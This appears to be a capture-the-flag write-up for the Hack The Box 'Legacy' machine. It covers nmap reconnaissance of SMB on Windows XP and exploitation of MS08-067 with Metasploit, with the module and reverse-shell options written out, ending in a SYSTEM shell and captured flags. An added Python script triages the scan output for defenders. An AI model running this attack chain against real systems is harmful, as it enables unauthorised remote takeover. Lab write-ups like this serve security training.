Recon
Port and service detection with nmap:
nmap -A 10.10.10.4
The information returned by nmap is the following:
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h27m48s, deviation: 2h07m16s, median: 4d22h57m48s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:ff:c9 (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2022-07-15T00:00:06+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Let’s try to list the shares on port 445 (SMB) anonymously (-N sends no password):
smbclient -L //10.10.10.4 -N
It doesn’t work, and after trying some other default accounts we still can’t connect to the SMB server.
Let’s dig around the SMB server on port 445.
Maybe we can try CVE-2008-4250 (MS08-067, the Server service vulnerability), because the nmap scan shows the SMB server is probably running on Windows XP.
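The reasoning above rests on reading three things out of the nmap host-script output: the OS CPE (an end-of-life Windows XP), the SMB security mode (signing disabled, session granted as guest) and the failed SMB2 negotiation (SMB1 only). The following script, added here as an example and not part of the original writeup, parses that host-script section into a dictionary and emits the findings a defender would want to see in an asset report. The sample input is the host-script block from the scan above, embedded so the script runs offline; the end-of-life table is an assumption limited to the one OS the scan reports and can be extended.

```python
"""Triage helper for nmap SMB host-script output (added example)."""

# Constructed sample: the host-script section from the nmap -A scan above,
# written with nmap's real indentation (header lines have one space after
# the '|', key/value lines have three).
SAMPLE_NMAP_OUTPUT = """\
Host script results:
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:ff:c9 (VMware)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\\x00
|   Workgroup: HTB\\x00
|_  System time: 2022-07-15T00:00:06+03:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
"""

# Assumption: a minimal end-of-life table keyed by the CPE prefix nmap emits.
# Windows XP left extended support on 2014-04-08; extend as needed.
EOL_OS_CPES = {
    "cpe:/o:microsoft:windows_xp": "Windows XP (extended support ended 2014-04-08)",
}


def parse_host_scripts(text: str) -> dict:
    """Return {script_name: {key: value}} for an nmap host-script section.

    A script header sits right after '|' or '|_' with at most one space of
    indentation; its key/value lines are indented further. A header that
    carries its whole result on one line is stored under '_summary'.
    """
    scripts = {}
    current = None
    for raw in text.splitlines():
        if not raw.startswith("|"):
            current = None  # left the script block
            continue
        body = raw[2:] if raw.startswith("|_") else raw[1:]
        indent = len(body) - len(body.lstrip(" "))
        key, sep, value = body.strip().partition(":")
        if not sep:
            continue  # blank '|' spacer line
        if indent <= 1:
            current = key
            scripts[current] = {}
            if value.strip():
                scripts[current]["_summary"] = value.strip()
        elif current is not None:
            scripts[current][key.strip()] = value.strip()
    return scripts


def triage(scripts: dict) -> list:
    """Turn parsed SMB script results into findings with a severity label."""
    findings = []
    os_cpe = scripts.get("smb-os-discovery", {}).get("OS CPE", "")
    for eol_cpe, label in EOL_OS_CPES.items():
        if os_cpe.startswith(eol_cpe):
            findings.append(f"HIGH: end-of-life OS exposing SMB: {label}; no security updates available")
    sec = scripts.get("smb-security-mode", {})
    if sec.get("message_signing", "").startswith("disabled"):
        findings.append("MEDIUM: SMB message signing disabled; require signing via policy")
    if sec.get("account_used") == "guest":
        findings.append("MEDIUM: SMB session granted as guest; anonymous enumeration possible")
    smb2 = scripts.get("smb2-time", {}).get("_summary", "")
    if smb2.startswith("Protocol negotiation failed"):
        findings.append("INFO: no SMB2/3 negotiated; SMB1-only host should be isolated or retired")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_host_scripts(SAMPLE_NMAP_OUTPUT)):
        print(finding)
```

Running it against the embedded sample yields one HIGH finding (end-of-life OS), two MEDIUM findings (signing disabled, guest session) and one INFO finding (SMB1 only), which is exactly the risk picture the writeup exploits next. Feeding it a full `nmap -A` report works the same way, since lines that do not start with `|` simply reset the parser.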
Exploit
To make it simple, we are going to use Metasploit and the exploit module windows/smb/ms08_067_netapi.
Now we just have to set our options like this:
* RHOST : 10.10.10.4
* RPORT : 445
* LHOST : 10.10.16.6
* LPORT : 4321
And here is the shell:
Shell Banner:
Microsoft Windows XP [Version 5.1.2600]
-----
C:\WINDOWS\system32>
Post-exploitation
As usual, we can find the user flag on the desktop.
Same thing with the root flag, as our reverse shell is running as SYSTEM.
Easy, External, Network, SAMBA, Penetration Tester Level 2, Remote Code Execution, CVE-2008-4250, Public Vulnerabilities, CVE Exploitation